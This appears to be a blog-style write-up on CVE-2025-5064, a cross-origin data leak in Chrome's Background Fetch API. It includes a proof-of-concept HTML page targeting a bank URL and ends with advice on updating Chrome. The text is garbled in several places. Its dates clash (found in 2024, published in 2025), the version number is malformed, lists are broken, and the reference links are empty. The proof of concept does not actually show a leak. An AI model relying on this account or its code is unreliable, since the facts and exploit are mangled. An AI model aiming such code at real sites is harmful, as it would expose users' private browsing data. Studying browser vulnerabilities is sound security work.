CVE-2025-5064 - Exploiting Background Fetch API Vulnerability in Google Chrome for Cross-Origin Data Leaks

----

In June 2024, a new security flaw labeled CVE-2025-5064 was found in Google Chrome’s implementation of the Background Fetch API. This bug allowed crafty attackers to bypass browser security—specifically the “same-origin policy”—and steal information from other websites the user visited. The issue was fixed in Chrome version 137..7151.55, but if you’re running an older version, you might still be vulnerable.

This post breaks down what went wrong, how hackers could abuse it, and why it matters—even if you’re not a programmer. I’ll show code samples, explain how the attack works, and link to the original Chrome security notes.

What is the Background Fetch API?

The Background Fetch API lets websites download or upload large files, even while you browse away from the page. For instance, a site might use it so you can start a big download, then switch tabs without losing progress.

Normally, browser security rules say a site can only access its own data (“same-origin”). That means evilsite.com shouldn’t be able to read stuff you loaded from bank.com.

What Was the Problem? (CVE-2025-5064)

Before Chrome 137..7151.55, the Background Fetch API didn’t always enforce strict origin checks. A web page could use this API to trigger fetches to *other* sites—then, with a clever trick, access details about those requests. This broke the security model:

How it’s triggered: A crafted (maliciously coded) HTML page

- Potential impact: Leak sensitive info, like whether you're logged in to sites or details of your web activity

That site uses Background Fetch to make a request to a target site (like your bank, email, etc.).

3. Due to bad origin checks, the attacking site can see responses (even if not the page contents, but sometimes HTTP status, headers, or timing data).
4. Attacker uses this leak to infer cross-origin secrets—anything from login status to personalized data.

Below is a simple JavaScript snippet showing how the attack could work *before the patch*

<!-- Save as PoC.html and open in old Chrome -->
<!DOCTYPE html>
<html>
  <body>
    <script>
      async function attack() {
        // Target a cross-origin resource, e.g., a user profile on another site
        const targetURL = "https://victim-bank.com/account/info";;
        const registration = await navigator.serviceWorker.ready;
        try {
          await registration.backgroundFetch.fetch(
            'test-leak',           // Unique ID for the fetch
            [targetURL],           // Array of URLs to fetch
            {
              title: 'Leak Test',
              icons: [],
              downloadTotal: 10000
            }
          );
        } catch (err) {
          // Some browsers block, but in Chrome <137, this could leak info
          alert('May have leaked cross-origin fetch details: ' + err);
        }
      }

      attack();
    </script>
    <p>If your browser is vulnerable, attacker can leak things like login status or custom info from another site!</p>
  </body>
</html>

> Note: This code won’t work in fixed Chrome and is provided for educational/research purposes.

Status codes (e.g., 200 OK vs 401 Unauthorized)

- Fetch progress or failure info (e.g., if the resource doesn’t exist, or is personalized based on login)

Sometimes *response headers* not meant for other origins

Even small leaks can be chained for bigger attacks—like finding out if you're logged into certain sites, your email address, or your account ID.

Chromium Security Note:

- CVE-2025-5064 Report
- Background Fetch API Documentation
- Chromium source code diff for fix (search for CVE-2025-5064)

Official Chrome Patch Version:

- Chrome 137..7151.55 Patch Notes

How to Protect Yourself

- Update Chrome. Always run the latest stable version—especially if you use Chrome for sensitive accounts.
- Disable third-party scripts/extensions on unknown sites.
- Use browser security settings or privacy extensions that block sketchy JavaScript on suspicious pages.

Developers: Double-check your own code for security holes. Never trust cross-origin requests, and keep up-to-date with browser security best practices.

Why Does This Matter?

Bugs like CVE-2025-5064 show that even “medium” severity problems can cause real-world privacy leaks. When browsers mess up same-origin rules, attackers get powerful tools to snoop on your personal data.

*For web users, the main takeaway is to trust browser updates—they’re your first line of defense! For researchers and developers, watch for API changes and take all cross-origin leaks seriously.*

Timeline

Published on: 05/27/2025 21:15:22 UTC
Last modified on: 05/29/2025 15:51:09 UTC